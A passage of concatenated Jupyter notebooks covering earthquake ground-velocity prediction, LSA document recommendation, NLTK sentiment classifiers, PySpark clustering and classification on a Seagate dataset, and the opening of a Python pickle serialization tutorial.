x m/s)') plt.grid() cbar=plt.colorbar(pad=0) cbar.set_label((15*' ').join(['brine', 'gas', 'shale'])) cbar.set_ticks(range(0,1)); cbar.set_ticklabels('') plt.tight_layout() ###Output _____no_output_____
0neural network.ipynb
###Markdown kumamoto0414 ###Code kumamoto0414=pd.read_csv('kumamoto.csv') kumamoto0414.head() Ypgvkumamoto0414=mlp.predict(kumamoto0414) Lkumamoto0414=kumamoto0414.iloc[:,1].values Kpgvkumamoto0414=pd.read_csv('pgvkumamoto.csv') plt.title('kumamoto0414') plt.scatter(Lkumamoto0414,Kpgvkumamoto0414, color='green', label='kansoku',alpha=1) plt.scatter(Lkumamoto0414,Ypgvkumamoto0414, color='darkorange', label='yosoku',alpha=1) plt.xlim(10,500) plt.xlabel('distance(km)') plt.ylabel('pgv(cm/s)') plt.yscale('log') plt.xscale('log') plt.legend() plt.grid(True) plt.show print('Mean Absolute Error',metrics.mean_absolute_error(Kpgvkumamoto0414,Ypgvkumamoto0414)) print('Mean Squared Error:', metrics.mean_squared_error(Kpgvkumamoto0414,Ypgvkumamoto0414)) print('Root Mean Squared Error:', np.sqrt(metrics.mean_squared_error(Kpgvkumamoto0414, Ypgvkumamoto0414))) from sklearn.metrics import r2_score print('r^2 test data: ', r2_score(Kpgvkumamoto0414,Ypgvkumamoto0414)) ###Output r^2 test data: 0.17459876441454936 ###Markdown kumamoto0416 ###Code kumamoto0416=pd.read_csv('kumamoto416.csv') kumamoto0416.head() Ypgvkumamoto0416=mlp.predict(kumamoto0416) Lkumamoto0416=kumamoto0416.iloc[:,1].values Kpgvkumamoto0416=pd.read_csv('pgvkumamoto416.csv') plt.title('kumamoto0416') plt.scatter(Lkumamoto0416,Kpgvkumamoto0416, color='green', label='kansoku',alpha=1) plt.scatter(Lkumamoto0416,Ypgvkumamoto0416, color='darkorange', label='yosoku',alpha=1) plt.xlim(10,1500) plt.xlabel('distance(km)') plt.ylabel('pgv(cm/s)') plt.yscale('log') plt.xscale('log') plt.legend() plt.grid(True) plt.show print('Mean Absolute Error',metrics.mean_absolute_error(Kpgvkumamoto0416,Ypgvkumamoto0416)) print('Mean Squared Error:', metrics.mean_squared_error(Kpgvkumamoto0416,Ypgvkumamoto0416)) print('Root Mean Squared Error:', np.sqrt(metrics.mean_squared_error(Kpgvkumamoto0416, Ypgvkumamoto0416))) ###Output Mean Absolute Error 2.996679669834763 Mean Squared Error: 49.066334748408224 Root Mean Squared Error: 7.004736593791963 ###Markdown osaka0618 ###Code osaka0618=pd.read_csv('osaka0618.csv') osaka0618.head() Ypgvosaka0618=mlp.predict(osaka0618) Losaka0618=osaka0618.iloc[:,1].values Kpgvosaka0618=pd.read_csv('pgvosaka0618.csv') plt.title('osaka0618') plt.scatter(Losaka0618,Kpgvosaka0618, color='green', label='kansoku',alpha=1) plt.scatter(Losaka0618,Ypgvosaka0618, color='darkorange', label='yosoku',alpha=1) plt.xlim(10,500) plt.xlabel('distance(km)') plt.ylabel('pgv(cm/s)') plt.yscale('log') plt.xscale('log') plt.legend() plt.grid(True) plt.show print('Mean Absolute Error',metrics.mean_absolute_error(Kpgvosaka0618,Ypgvosaka0618)) print('Mean Squared Error:', metrics.mean_squared_error(Kpgvosaka0618,Ypgvosaka0618)) print('Root Mean Squared Error:', np.sqrt(metrics.mean_squared_error(Kpgvosaka0618, Ypgvosaka0618))) ###Output Mean Absolute Error 1.6959718992784847 Mean Squared Error: 15.254963398931798 Root Mean Squared Error: 3.9057602843661305 ###Markdown hokkaido0906 ###Code hokkaido0906=pd.read_csv('hokkaido0906.csv') hokkaido0906.head() Ypgvhokkaido0906=mlp.predict(hokkaido0906) Lhokkaido0906=hokkaido0906.iloc[:,1].values Kpgvhokkaido0906=pd.read_csv('pgvhokkaido0906.csv') plt.title('hokkaido0906') plt.scatter(Lhokkaido0906,Kpgvhokkaido0906, color='green', label='kansoku',alpha=1) plt.scatter(Lhokkaido0906,Ypgvhokkaido0906, color='darkorange', label='yosoku',alpha=1) plt.xlim(10,1000) plt.xlabel('distance(km)') plt.ylabel('pgv(cm/s)') plt.yscale('log') plt.xscale('log') plt.legend() plt.grid(True) plt.show print('Mean Absolute Error',metrics.mean_absolute_error(Kpgvhokkaido0906,Ypgvhokkaido0906)) print('Mean Squared Error:', metrics.mean_squared_error(Kpgvhokkaido0906,Ypgvhokkaido0906)) print('Root Mean Squared Error:', np.sqrt(metrics.mean_squared_error(Kpgvhokkaido0906, Ypgvhokkaido0906))) ###Output Mean Absolute Error 3.3931648425860472 Mean Squared Error: 87.72881878979227 Root Mean Squared Error: 9.366366360002809 ###Markdown テスト100以下 hokkaido ###Code hokkaido100=pd.read_csv('h100.csv') Ypgvhokkaido100=mlp.predict(hokkaido100) Lhokkaido100=hokkaido100.iloc[:,1].values Kpgvhokkaido100=pd.read_csv('ph100.csv') plt.title('hokkaido100') plt.scatter(Lhokkaido100,Kpgvhokkaido100,s=13, color='green', label='kansoku',alpha=1) plt.scatter(Lhokkaido100,Ypgvhokkaido100,s=13, color='orange', label='yosoku',alpha=1) plt.xlim(10,100) plt.ylim(1,300) plt.xlabel('distance(km)') plt.ylabel('pgv(cm/s)') plt.yscale('log') plt.xscale('log') plt.legend() plt.grid(True) plt.show print('Mean Absolute Error',metrics.mean_absolute_error(Kpgvhokkaido100,Ypgvhokkaido100)) print('Mean Squared Error:', metrics.mean_squared_error(Kpgvhokkaido100,Ypgvhokkaido100)) print('Root Mean Squared Error:', np.sqrt(metrics.mean_squared_error(Kpgvhokkaido100,Ypgvhokkaido100))) ###Output Mean Absolute Error 12.430680350728197 Mean Squared Error: 555.5608575338796 Root Mean Squared Error: 23.570338511228037 ###Markdown osaka ###Code osaka100=pd.read_csv('o100.csv') Ypgvosaka100=mlp.predict(osaka100) Losaka100=osaka100.iloc[:,1].values Kpgvosaka100=pd.read_csv('po100.csv') plt.title('osaka100') plt.scatter(Losaka100,Kpgvosaka100,s=13, color='green', label='kansoku',alpha=1) plt.scatter(Losaka100,Ypgvosaka100,s=13, color='orange', label='yosoku',alpha=1) plt.xlim(10,100) plt.ylim(1,100) plt.xlabel('distance(km)') plt.ylabel('pgv(cm/s)') plt.yscale('log') plt.xscale('log') plt.legend() plt.grid(True) plt.show print('Mean Absolute Error',metrics.mean_absolute_error(Kpgvosaka100,Ypgvosaka100)) print('Mean Squared Error:', metrics.mean_squared_error(Kpgvosaka100,Ypgvosaka100)) print('Root Mean Squared Error:', np.sqrt(metrics.mean_squared_error(Kpgvosaka100,Ypgvosaka100))) ###Output Mean Absolute Error 4.044321723784055 Mean Squared Error: 63.70960301104061 Root Mean Squared Error: 7.981829552868228 ###Markdown kumamoto0416 ###Code kh100=pd.read_csv('kh100.csv') Ypgvkh100=mlp.predict(kh100) Lkh100=kh100.iloc[:,1].values Kpgvkh100=pd.read_csv('pkh100.csv') plt.title('kumamoto(0416)100') plt.scatter(Lkh100,Kpgvkh100,s=13, color='green', label='kansoku',alpha=1) plt.scatter(Lkh100,Ypgvkh100,s=13, color='orange', label='yosoku',alpha=1) plt.xlim(10,100) plt.ylim(1,200) plt.xlabel('distance(km)') plt.ylabel('pgv(cm/s)') plt.yscale('log') plt.xscale('log') plt.legend() plt.grid(True) plt.show print('Mean Absolute Error',metrics.mean_absolute_error(Kpgvkh100,Ypgvkh100)) print('Mean Squared Error:', metrics.mean_squared_error(Kpgvkh100,Ypgvkh100)) print('Root Mean Squared Error:', np.sqrt(metrics.mean_squared_error(Kpgvkh100,Ypgvkh100))) ###Output Mean Absolute Error 9.254420001665043 Mean Squared Error: 249.43201457090316 Root Mean Squared Error: 15.793416811155943 ###Markdown kumamoto0414 ###Code kz100=pd.read_csv('kz100.csv') Ypgvkz100=mlp.predict(kz100) Lkz100=kz100.iloc[:,1].values Kpgvkz100=pd.read_csv('pkz100.csv') plt.title('kumamoto(0414)100') plt.scatter(Lkz100,Kpgvkz100,s=13, color='green', label='kansoku',alpha=1) plt.scatter(Lkz100,Ypgvkz100,s=13, color='orange', label='yosoku',alpha=1) plt.xlim(10,100) plt.ylim(1,200) plt.xlabel('distance(km)') plt.ylabel('pgv(cm/s)') plt.yscale('log') plt.xscale('log') plt.legend() plt.grid(True) plt.show print('Mean Absolute Error',metrics.mean_absolute_error(Kpgvkz100,Ypgvkz100)) print('Mean Squared Error:', metrics.mean_squared_error(Kpgvkz100,Ypgvkz100)) print('Root Mean Squared Error:', np.sqrt(metrics.mean_squared_error(Kpgvkz100,Ypgvkz100))) ###Output Mean Absolute Error 6.330815098707226 Mean Squared Error: 130.0407185445954 Root Mean Squared Error: 11.40353973749359
notebooks/Latent_semantic_analysis.ipynb
###Markdown UNSUPERVISED LEARNING Recommending documents with LSA---- ❗ NLTK is hard to install. I recommend running this notebook in Google Colab instead: https://drive.google.com/file/d/1xel4VmTqzFoZkOiEijyGhYuH6BQW5lYM/view?usp=sharing----We'd like to find documents with similar content to a document we like, but without having to rely on tagging or other labels. This is what **latent semantic analysis** is for. We can 'sense' the meaning of a document from the words it contains.Inspired by and/or based on [**science concierge**](https://github.com/titipata/science_concierge) and [**Chris Clark's repo**](https://github.com/groveco/content-engine) on content-based recommendation.[This blog post](https://www.themarketingtechnologist.co/a-recommendation-system-for-blogs-content-based-similarity-part-2/) is also really good. [Pysuggest](https://pypi.python.org/pypi/pysuggest) might be worth looking at, and so might [Crab](https://muricoca.github.io/crab/).Believe it or not, we can do all of it in about 10 lines of code!----We'll start with some data: ###Code import pandas as pd df = pd.read_csv('https://raw.githubusercontent.com/seg/2017-tle-hall/master/data/title_abstract_doi.csv') df.head() ###Output _____no_output_____ ###Markdown Prepare the data ###Code from nltk.stem.porter import PorterStemmer from nltk.tokenize import RegexpTokenizer # Instantiate the stemmer and tokenizer. stemmer, tokenizer = PorterStemmer(), RegexpTokenizer(r'\w+') # Make a function to preprocess each item in the data. def preprocess(item): # 3 return ' '.join(stemmer.stem(token) for token in tokenizer.tokenize(item)) # Apply the preprocessing. data = [preprocess(item) for item in df.abstract] ###Output _____no_output_____ ###Markdown Compute the document matrixThe matrix is a **term frequency, inverse document frequency** or "tfidf" matrix. This counts how many times words and/or phrases ('terms') appear in a document, then scales those frequencies to the inverse of how frequent they are in the cohort. So a rare word like 'coulomb' carries more weight than a common one like 'seismic'.The `sklearn` implementation automatically filters 'stop' words, eliminating things like 'the' or 'this'. It works just like `sklearn`'s other models: ###Code from sklearn.feature_extraction.text import TfidfVectorizer tfidf = TfidfVectorizer(stop_words='english', ngram_range=(1,1)) vecs = tfidf.fit_transform(data) ###Output _____no_output_____ ###Markdown The resulting matrix has one row for each document, and one colun for each 'term'. If we include n-grams, which are groups of words, the matrix will be very large. ###Code vecs.shape ###Output _____no_output_____ ###Markdown Reduce the number of dimensionsTo make the matrix more manageable, we can reduce the number of dimensions with singular value decomposition. We'll reduce it down to 100 dimensions. ###Code from sklearn.decomposition import TruncatedSVD svd = TruncatedSVD(n_components=100).fit_transform(vecs) ###Output _____no_output_____ ###Markdown Build and store the distance treeThe distance tree is a fast dta structure for finding nearest neighbours in a high-dimensional space. ###Code from sklearn.neighbors import KDTree tree = KDTree(svd) ###Output _____no_output_____ ###Markdown Query the tree for recommendationsNow we can find a paper we're interested in and try to find similar papers. ###Code target = 333 df.title[target] # Recommend 5 docs for a single document. _, idx = tree.query([svd[target]], k=6) [df.title[i] for i in idx[0] if i != target] ###Output _____no_output_____
wei/p18.ipynb
###Markdown p.18 Better Training Data ###Code from IPython.display import YouTubeVideo YouTubeVideo('UF-RyxOAHQw') ###Output _____no_output_____ ###Markdown 1. A new datasetMuch shorter movie reviews at https://pythonprogramming.net/static/downloads/short_reviews/. 2. Example ###Code import nltk import random import string from nltk.corpus import stopwords from nltk.tokenize import word_tokenize from nltk.classify.scikitlearn import SklearnClassifier import pickle from sklearn.naive_bayes import MultinomialNB, GaussianNB, BernoulliNB from sklearn.linear_model import LogisticRegression, SGDClassifier from sklearn.svm import SVC, LinearSVC, NuSVC from nltk.classify import ClassifierI from statistics import mode class VoteClassifier(ClassifierI): def __init__(self, *classifiers): self._classifiers = classifiers def classify(self, features): votes = [] for c in self._classifiers: v = c.classify(features) votes.append(v) return mode(votes) def confidence(self, features): votes = [] for c in self._classifiers: v = c.classify(features) votes.append(v) choice_votes = votes.count(mode(votes)) conf = choice_votes/len(votes) return conf # If you see the "UnicodeDecodeError", add the options "encoding='utf-8', errors='replace'". short_pos = open("short_reviews/positive.txt", "r", encoding='utf-8', errors='replace').read() short_neg = open("short_reviews/negative.txt", "r", encoding='utf-8', errors='replace').read() documents = [] # Note that each entry of documents is a short review, not a single word from the short review. for r in short_pos.split('\n'): documents.append((r, "pos")) for r in short_neg.split('\n'): documents.append((r, "neg")) all_words = [] short_pos_words = word_tokenize(short_pos) short_neg_words = word_tokenize(short_neg) # Remove the stop words and the punctuations. stop_words = set(stopwords.words("english")) stop_words = stop_words.union(set(string.punctuation)) #print("stop_words:\n", stop_words) for w in short_pos_words: if w.lower() not in stop_words: all_words.append(w.lower()) for w in short_neg_words: if w.lower() not in stop_words: all_words.append(w.lower()) all_words = nltk.FreqDist(all_words) # Restrict our 'features' to the most common 5000 words. word_features = all_words.most_common(5000) word_features = [wf[0] for wf in word_features] # Check if each of the most common 5000 words is present in one movie review. # The input document is a short review. def find_features(document): words = word_tokenize(document) features = {} for w in word_features: features[w] = (w in words) return features # print((find_features(movie_reviews.words('neg/cv000_29416.txt')))) # Label the 'features' in all the movie reviews. featuresets = [(find_features(rev), category) for (rev, category) in documents] random.shuffle(featuresets) # Partition the entire data set into training set and test set. training_set = featuresets[:10000] testing_set = featuresets[10000:] ## ## Trained naive Bayes classifier ## # Don't load this naive Bayes classfier which was trained for the long movie reviews. #classifier_f = open("naivebayes.pickle", "rb") #classifier = pickle.load(classifier_f) #classifier_f.close() #print("Naive Bayes Algo accuracy percent:", (nltk.classify.accuracy(classifier, testing_set))*100) #classifier.show_most_informative_features(15) ## ## Scikit-Learn MultinomialNB ## MultinomialNB_classifier = SklearnClassifier(MultinomialNB()) MultinomialNB_classifier.train(training_set) print("MNB_classifier accuracy percent:", (nltk.classify.accuracy(MultinomialNB_classifier, testing_set))*100) ## ## Scikit-Learn GaussianNB ## # GaussianNB_classifier = SklearnClassifier(GaussianNB()) # GaussianNB_classifier.train(training_set) # print("GaussianNB_classifier accuracy percent:", (nltk.classify.accuracy(GaussianNB_classifier, testing_set))*100) ## ## Scikit-Learn BernoulliNB ## BernoulliNB_classifier = SklearnClassifier(BernoulliNB()) BernoulliNB_classifier.train(training_set) print("BernoulliNB_classifier accuracy percent:", (nltk.classify.accuracy(BernoulliNB_classifier, testing_set))*100) ## ## Scikit-Learn LogisticRegression ## LogisticRegression_classifier = SklearnClassifier(LogisticRegression()) LogisticRegression_classifier.train(training_set) print("LogisticRegression_classifier accuracy percent:", (nltk.classify.accuracy(LogisticRegression_classifier, testing_set))*100) ## ## Scikit-Learn SGDClassifier ## SGDClassifier_classifier = SklearnClassifier(SGDClassifier()) SGDClassifier_classifier.train(training_set) print("SGDClassifier_classifier accuracy percent:", (nltk.classify.accuracy(SGDClassifier_classifier, testing_set))*100) ## ## Scikit-Learn SVC ## # The performance of the classic SVC is poor, so it is NOT used. #SVC_classifier = SklearnClassifier(SVC()) #SVC_classifier.train(training_set) #print("SVC_classifier accuracy percent:", (nltk.classify.accuracy(SVC_classifier, testing_set))*100) ## ## Scikit-Learn LinearSVC ## LinearSVC_classifier = SklearnClassifier(LinearSVC()) LinearSVC_classifier.train(training_set) print("LinearSVC_classifier accuracy percent:", (nltk.classify.accuracy(LinearSVC_classifier, testing_set))*100) ## ## Scikit-Learn NuSVC ## NuSVC_classifier = SklearnClassifier(NuSVC()) NuSVC_classifier.train(training_set) print("NuSVC_classifier accuracy percent:", (nltk.classify.accuracy(NuSVC_classifier, testing_set))*100) voted_classifier = VoteClassifier(#classifier, MultinomialNB_classifier, BernoulliNB_classifier, LogisticRegression_classifier, #SGDClassifier_classifier, LinearSVC_classifier, NuSVC_classifier) print("voted_classifier accuracy percent:", (nltk.classify.accuracy(voted_classifier, testing_set))*100) # print("Classification: ", voted_classifier.classify(testing_set[0][0]), # "Confidence %: ", voted_classifier.confidence(testing_set[0][0])*100) # print("Classification: ", voted_classifier.classify(testing_set[1][0]), # "Confidence %: ", voted_classifier.confidence(testing_set[1][0])*100) # print("Classification: ", voted_classifier.classify(testing_set[2][0]), # "Confidence %: ", voted_classifier.confidence(testing_set[2][0])*100) # print("Classification: ", voted_classifier.classify(testing_set[3][0]), # "Confidence %: ", voted_classifier.confidence(testing_set[3][0])*100) # print("Classification: ", voted_classifier.classify(testing_set[4][0]), # "Confidence %: ", voted_classifier.confidence(testing_set[4][0])*100) # print("Classification: ", voted_classifier.classify(testing_set[5][0]), # "Confidence %: ", voted_classifier.confidence(testing_set[5][0])*100) ###Output MNB_classifier accuracy percent: 81.47590361445783 BernoulliNB_classifier accuracy percent: 80.87349397590361 LogisticRegression_classifier accuracy percent: 80.12048192771084
docs/Seagate Project/Seagate_Project.ipynb
###Markdown K Means ###Code from pyspark.ml.clustering import KMeans from pyspark.ml.evaluation import ClusteringEvaluator silhouette_score2=[] evaluator = ClusteringEvaluator(predictionCol='prediction', featuresCol='features', metricName='silhouette', distanceMeasure='squaredEuclidean') for i in range(2,20): KMeans_algo=KMeans(featuresCol='features', k=i) KMeans_fit=KMeans_algo.fit(df_v) output=KMeans_fit.transform(df_v) score=evaluator.evaluate(output) silhouette_score2.append(score) print("Silhouette Score:",score) fig, ax = plt.subplots(1,1, figsize =(8,6)) ax.plot(range(2,20),silhouette_score2) ax.set_xlabel('k') ax.set_ylabel('cost') df_ss = df_ss.withColumn("idx", fn.monotonically_increasing_id()) from pyspark.ml.clustering import KMeans from pyspark.ml.evaluation import ClusteringEvaluator evaluator = ClusteringEvaluator(predictionCol='prediction', featuresCol='scaled_features', metricName='silhouette', distanceMeasure='squaredEuclidean') k = 2 kmeans = KMeans().setK(k).setSeed(1).setFeaturesCol("scaled_features") model = kmeans.fit(df_ss) centers = model.clusterCenters() print("Cluster Centers: ") for center in centers: print(center) predictions = model.transform(df_ss) silhouette = evaluator.evaluate(predictions) print("Silhouette with squared euclidean distance = " + str(silhouette)) print("Cluster Centers: ") ctr=[] centers = model.clusterCenters() for center in centers: ctr.append(center) ###Output Silhouette with squared euclidean distance = 0.17330592905654787 Cluster Centers: [-1.10568157e-02 1.34843725e-02 -1.04165171e-02 -1.07746528e-02 -1.82602199e-02 -5.35942898e-03 -1.59187558e-02 -1.92205419e-03 -3.21163442e-03 -1.70558380e-02 -8.81915530e-03 -6.46422412e-02 2.19091126e-02 -6.63283877e-02 3.55648284e-03 -1.23584312e-02 1.49290632e-03 -7.66098439e-03 6.68002717e-04 -1.11116874e-02 7.54137867e-04 1.98849887e-02 1.59907224e-02 -1.09136177e-02 -9.60715084e-03 -6.06493694e-02 -4.61885312e-02 -4.44842920e-02 -3.98679304e-03 -1.37413704e-02 9.15865457e-03 7.60859348e-03 -3.74162031e-02 -2.39044254e-02 8.40289097e-03 -4.16010105e-02 3.70695648e-02 1.10310233e-02 2.19313502e-02 1.77222300e-02 5.36477363e-02 -5.45637179e-02 7.87159762e-03 2.90631725e-04 -4.19009058e-01 -4.59656757e-03 4.19077903e-01 -7.54482487e-02 7.54482487e-02 2.40856690e-03 3.60244610e-03 -7.50485651e-02 7.48556008e-02 -1.17053363e-03 1.70113831e-02 1.33078735e-02 -7.71346423e-02 1.59010531e-01 -9.46546529e-02 -7.80095966e-02 8.50552162e-02 -8.50552162e-02 3.74939351e-02 2.50487766e-01 -3.36164382e-01 -1.31308431e-02 3.28869333e-03 1.05387308e-02 2.20105433e-03 1.11732540e-02 7.56609515e-03 -8.09948540e-04 -2.11786570e-03 -4.38592868e-02 2.78227936e-03 5.41773431e-03 3.27517648e-03 4.11810283e-03 -1.98147911e-03 2.83417694e-03 -5.16867116e-03 -1.14333043e-01 -5.69603035e-02 -6.87829857e-02 -6.17918061e-02 1.34407382e-01 -1.41018271e-01 3.70226779e-01 -2.44944142e-01 -2.15179912e-01 8.12204932e-03 6.97542646e-03 -2.79953174e-02 2.22467261e-02 2.48139751e-02 3.29965674e-02 -1.33523132e-01 9.20129789e-02 -6.66564860e-03 -5.24975561e-03 -1.60558163e-02 1.52833106e-01 -7.30094880e-02 -6.69709784e-03 -1.31171924e-01 3.06982277e-03 8.46501453e-03 1.65428156e-01 -5.32459648e-02 -6.64559195e-03 -1.69188955e-01 -8.65720313e-02 -2.08733285e-02 8.62520213e-02 -3.52431367e-05 8.95333791e-02 -2.12298653e-02 -8.00797023e-02 -8.10280748e-03 -3.25379090e-04 -2.58043674e-02 -5.92491508e-01 -6.10100977e-03 5.92554985e-01] [ 3.04314511e-02 -3.71127668e-02 2.86691700e-02 2.96548598e-02 5.02572353e-02 1.47506484e-02 4.38128707e-02 5.29003102e-03 8.83931670e-03 4.69424392e-02 2.42727834e-02 1.77913538e-01 -6.03000091e-02 1.82554285e-01 -9.78843606e-03 3.40138612e-02 -4.10889597e-03 2.10851730e-02 -1.83853042e-03 3.05824734e-02 -2.07559845e-03 -5.47290537e-02 -4.40109431e-02 3.00373301e-02 2.64415676e-02 1.66924037e-01 1.27123764e-01 1.22433220e-01 1.09727701e-02 3.78200967e-02 -2.52071804e-02 -2.09409785e-02 1.02979862e-01 6.57916683e-02 -2.31271075e-02 1.14497623e-01 -1.02025816e-01 -3.03604630e-02 -6.03612131e-02 -4.87765364e-02 -1.47653584e-01 1.50174621e-01 -2.16648395e-02 -7.99899840e-04 1.15323019e+00 1.26510403e-02 -1.15341967e+00 2.07654694e-01 -2.07654694e-01 -6.62905013e-03 -9.91493980e-03 2.06554653e-01 -2.06023562e-01 3.22163613e-03 -4.68200870e-02 -3.66269920e-02 2.12296122e-01 -4.37641479e-01 2.60516094e-01 2.14704241e-01 -2.34095757e-01 2.34095757e-01 -1.03193802e-01 -6.89412431e-01 9.25218454e-01 3.61397547e-02 -9.05140436e-03 -2.90055364e-02 -6.05791748e-03 -3.07519219e-02 -2.08240112e-02 2.22920504e-03 5.82895908e-03 1.20713031e-01 -7.65761141e-03 -1.49111210e-02 -9.01420222e-03 -1.13341714e-02 5.45358504e-03 -7.80044807e-03 1.42256295e-02 3.14676529e-01 1.56770695e-01 1.89310025e-01 1.70068343e-01 -3.69926729e-01 3.88121745e-01 -1.01896770e+00 6.74154825e-01 5.92235335e-01 -2.23541527e-02 -1.91983257e-02 7.70509479e-02 -6.12292159e-02 -6.82950035e-02 -9.08157874e-02 3.67493025e-01 -2.53245467e-01 1.83457303e-02 1.44487966e-02 4.41900997e-02 -4.20639478e-01 2.00942542e-01 1.84322874e-02 3.61021843e-01 -8.44901134e-03 -2.32980889e-02 -4.55304579e-01 1.46547796e-01 1.82905288e-02 4.65655350e-01 2.38270457e-01 5.74492413e-02 -2.37389700e-01 9.69989748e-05 -2.46420915e-01 5.84305304e-02 2.20401751e-01 2.23011937e-02 8.95534312e-04 7.10208402e-02 1.63070244e+00 1.67916862e-02 -1.63087714e+00] ###Markdown Logistic ###Code trainv, testv = df_v.randomSplit([0.7, 0.3], seed = 1) trains, tests = df_ss.randomSplit([0.7, 0.3], seed = 1) logistic = cl.LogisticRegression(maxIter=10,featuresCol = 'features',labelCol='TARGET') modelv = logistic.fit(trainv) test_modelv = modelv.transform(testv) trainingSummaryv = modelv.summary roc = trainingSummaryv.roc.toPandas() plt.plot(roc['FPR'],roc['TPR']) plt.ylabel('False Positive Rate') plt.xlabel('True Positive Rate') plt.title('ROC Curve') plt.show() print('Training set areaUnderROC: ' + str(trainingSummaryv.areaUnderROC)) import pyspark.ml.evaluation as ev evaluatorv = ev.BinaryClassificationEvaluator(rawPredictionCol='probability', labelCol='TARGET') print(evaluatorv.evaluate(test_modelv, {evaluatorv.metricName: 'areaUnderROC'})) logistic = cl.LogisticRegression(maxIter=10,featuresCol = 'scaled_features',labelCol='TARGET') models = logistic.fit(trains) test_models = models.transform(tests) trainingSummarys = models.summary roc = trainingSummarys.roc.toPandas() plt.plot(roc['FPR'],roc['TPR']) plt.ylabel('False Positive Rate') plt.xlabel('True Positive Rate') plt.title('ROC Curve') plt.show() print('Training set areaUnderROC: ' + str(trainingSummarys.areaUnderROC)) evaluators = ev.BinaryClassificationEvaluator(rawPredictionCol='probability', labelCol='TARGET') print(evaluators.evaluate(test_models, {evaluators.metricName: 'areaUnderROC'})) from pyspark.mllib.evaluation import MulticlassMetrics preds_and_labels = test_models.select(['prediction','TARGET']).withColumn('label', fn.col('TARGET').cast(types.FloatType())).orderBy('prediction') preds_and_labels = preds_and_labels.select(['prediction','label']) metrics = MulticlassMetrics(preds_and_labels.rdd.map(tuple)) print(metrics.confusionMatrix().toArray()) ###Output [[8.6422e+04 2.0000e+00] [2.3280e+03 0.0000e+00]] ###Markdown Random Forest ###Code df_v = df_v.withColumn('TARGET', fn.col('TARGET').cast(types.DoubleType())) df_ss = df_ss.withColumn('TARGET', fn.col('TARGET').cast(types.DoubleType())) trainv, testv = df_v.randomSplit([0.7, 0.3], seed = 1) trains, tests = df_ss.randomSplit([0.7, 0.3], seed = 1) classifier = cl.RandomForestClassifier(numTrees=5, maxDepth=5, featuresCol = 'features', labelCol='TARGET') modelv = classifier.fit(trainv) testv = modelv.transform(testv) print(evaluatorv.evaluate(testv, {evaluatorv.metricName: "areaUnderROC"})) classifier = cl.RandomForestClassifier(numTrees=5, maxDepth=5, featuresCol = 'scaled_features', labelCol='TARGET') models = classifier.fit(trains) tests = models.transform(tests) print(evaluators.evaluate(tests, {evaluators.metricName: "areaUnderROC"})) from pyspark.mllib.evaluation import MulticlassMetrics preds_and_labels = tests.select(['prediction','TARGET']).withColumn('label', fn.col('TARGET').cast(types.FloatType())).orderBy('prediction') preds_and_labels = preds_and_labels.select(['prediction','label']) metrics = MulticlassMetrics(preds_and_labels.rdd.map(tuple)) print(metrics.confusionMatrix().toArray()) ###Output [[86424. 0.] [ 2328. 0.]] ###Markdown GBT ###Code trainv, testv = df_v.randomSplit([0.7, 0.3], seed = 1) trains, tests = df_ss.randomSplit([0.7, 0.3], seed = 1) gbtv = cl.GBTClassifier(maxIter=10, labelCol='TARGET',featuresCol = 'features') gbtModelv = gbtv.fit(trainv) predictionsv = gbtModelv.transform(testv) import pyspark.ml.evaluation as ev evaluatorv = ev.BinaryClassificationEvaluator(rawPredictionCol='probability', labelCol='TARGET') evaluators = ev.BinaryClassificationEvaluator(rawPredictionCol='probability', labelCol='TARGET') print(evaluatorv.evaluate(predictionsv, {evaluatorv.metricName: "areaUnderROC"})) from pyspark.ml.tuning import ParamGridBuilder, CrossValidator paramGridv = (ParamGridBuilder() .addGrid(gbtv.maxDepth, [2, 4, 6]) .addGrid(gbtv.maxBins, [20, 60]) .addGrid(gbtv.maxIter, [10, 20]) .build()) cvv = CrossValidator(estimator=gbtv, estimatorParamMaps=paramGridv, evaluator=evaluatorv, numFolds=5) # Run cross validations. This can take about 6 minutes since it is training over 20 trees! cvModelv = cvv.fit(trainv) predictionsv = cvModelv.transform(testv) evaluatorv.evaluate(predictionsv) gbts = cl.GBTClassifier(maxIter=10, labelCol='TARGET',featuresCol = 'scaled_features') gbtModels = gbts.fit(trains) predictionss = gbtModels.transform(tests) print(evaluators.evaluate(predictionss, {evaluators.metricName: "areaUnderROC"})) from pyspark.ml.tuning import ParamGridBuilder, CrossValidator paramGrids = (ParamGridBuilder() .addGrid(gbts.maxDepth, [2, 4, 6]) .addGrid(gbts.maxBins, [20, 60]) .addGrid(gbts.maxIter, [10, 20]) .build()) cvs = CrossValidator(estimator=gbts, estimatorParamMaps=paramGrids, evaluator=evaluators, numFolds=5) # Run cross validations. This can take about 6 minutes since it is training over 20 trees! cvModels = cvs.fit(trains) predictionss = cvModels.transform(tests) evaluators.evaluate(predictionss) from pyspark.mllib.evaluation import MulticlassMetrics preds_and_labels = predictionss.select(['prediction','TARGET']).withColumn('label', fn.col('TARGET').cast(types.FloatType())).orderBy('prediction') preds_and_labels = preds_and_labels.select(['prediction','label']) metrics = MulticlassMetrics(preds_and_labels.rdd.map(tuple)) print(metrics.confusionMatrix().toArray()) print(metrics.confusionMatrix()) print(metrics.precision(0.0)) print(metrics.recall(0.0)) ###Output DenseMatrix([[8.6404e+04, 2.0000e+01], [2.3240e+03, 4.0000e+00]]) 0.9738075917410512 0.9997685828010737
Python/05. Modules/01.2 pickle.ipynb
###Markdown Persist Objects in Python Table of Contents * [Serialization in Python](serialization_in_python)* [Inside the Python pickle Module](inside_the_python_pickle_module)* [Protocol Formats of the Python pickle Module](protocol_formats_of_the_python_pickle_module)* [Picklable and Unpicklable Types](picklable_and_unpicklable_types)* [Compression of Pickled Objects](compression_of_pickled_objects)* [Security Concerns With the Python pickle Module](security_concerns_with_the_python_pickle_module)* [ Conclusion](_conclusion)--- As a developer, you may sometimes need to send complex object hierarchies over a network or save the internal state of your objects to a disk or database for later use. To accomplish this, you can use a process called serialization, which is fully supported by the standard library thanks to the Python `pickle` module. In this section, you’ll learn:- What it means to **serialize** and **deserialize** an object- Which **modules** you can use to serialize objects in Python- Which kinds of objects can be serialized with the Python `pickle` module- How to use the Python pickle module to serialize **object hierarchies**- What the **risks** are when deserializing an object from an untrusted sourceLet’s get pickling! Serialization in Python The **serialization** process is a way to convert a data structure into a linear form that can be stored or transmitted over a network. In Python, serialization allows you to take a complex object structure and transform it into a stream of bytes that can be saved to a disk or sent over a network. You may also see this process referred to as **marshalling**. The reverse process, which takes a stream of bytes and converts it back into a data structure, is called **deserialization** or **unmarshalling**. Serialization can be used in a lot of different situations. One of the most common uses is saving the state of a neural network after the training phase so that you can use it later without having to redo the training. Python offers three different modules in the standard library that allow you to serialize and deserialize 